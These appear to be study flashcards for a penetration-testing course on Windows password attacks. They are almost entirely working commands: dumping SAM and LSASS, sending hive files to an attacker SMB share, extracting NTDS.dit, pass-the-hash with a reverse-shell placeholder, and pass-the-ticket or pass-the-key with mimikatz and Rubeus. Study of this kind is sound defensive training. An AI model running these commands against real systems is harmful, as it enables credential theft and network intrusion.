Windows Password attacks Flashcards
Attacking SAM with the built-in cmd tool: what are the 3 registry hives, and which are essential?
How to transfer them to a Linux machine?
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save (system bootkey, essential)
reg.exe save hklm\security C:\sam.security (cached domain accounts)
transfer -> python3 smbserver.py -smb2support culo_share $(pwd)
move sam.save \\my_ip\culo_share
Attacking SAM and LSA remotely
crackmapexec smb ip --local-auth -u … -p … --sam (or --lsa)
Attacking LSASS from a Windows RDP session and from cmd, then cracking the hashes
1) Task Manager -> Processes -> Local Security Authority Process
2) get-process lsass (find the PID)
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID>
3) from the .dmp file, extract creds locally with pypykatz lsa minidump lsass.dmp
4) crack the hashes
Capturing NTDS.dit
only for domain-joined users (their credentials are not stored in the SAM database)
1) crackmapexec smb ip -u .. -p .. --ntds
2) or locally look in %SystemRoot%\NTDS
Pass the Hash (NTLM)
(mimikatz, invoke-thehash, impacket, crackmapexec, evil-winrm, xfreerdp)
1)mimikatz.exe privilege::debug
sekurlsa::pth
/user:julio /rc4:<hash> /run:cmd.exe (if the domain is unknown, use /domain:.)
from there you can check the new shares you have access to (Get-SmbConnection, Get-SmbShare)
2) invoke-thehash
import-module invoke-thehash.psd1
invoke-wmiexec -Target DC01 -Domain inlane.htb -Username … -Hash … -Command "<rev shell, like in base64>"
3) impacket-psexec admin@ip -hashes :..
4) crackmapexec smb ip/ip_range -u … -d . -H <hash>
5) evil-winrm -i ip -u … -H <hash>
6) xfreerdp /v:… /u:… /pth:…
Pass the ticket
gathering tickets and using them with mimikatz
1)gather tickets mimikatz.exe
privilege::debug
sekurlsa::tickets /export
2)mimikatz.exe
privilege::debug
kerberos::ptt "C:\...\ticket.kirbi" -> this opens a new cmd
or in mimikatz -> misc::cmd
Pass the key
key generation from NTLM hashes and passing it with mimikatz or Rubeus
1) extract kerberos key
mimikatz.exe
privilege::debug
sekurlsa::ekeys -> we get the keys (aes256, …) and the username
2) mimikatz
privilege::debug
sekurlsa::pth /domain:inlane.htb /user:username /ntlm:<key, aes256, …> -> creates a new cmd!
3) or with Rubeus
rubeus.exe asktgt /domain:inlane.htb /user:.. /aes256:… /nowrap
Pass the ticket: get tickets and pass them with Rubeus
1) rubeus.exe dump /nowrap
2) rubeus.exe asktgt /domain:inlane.htb /user:… /ptt /rc4:<hash>
or pass the .kirbi file
rubeus.exe ptt /ticket:file.kirbi
or in base64: /ticket:....
Pass the ticket in Linux
1) keytab files ->
kinit user@domain -k -t /opt/user.keytab
klist to check that the ticket was imported correctly
-> access shares
2) keytabextract.py file.keytab -> crack the hashes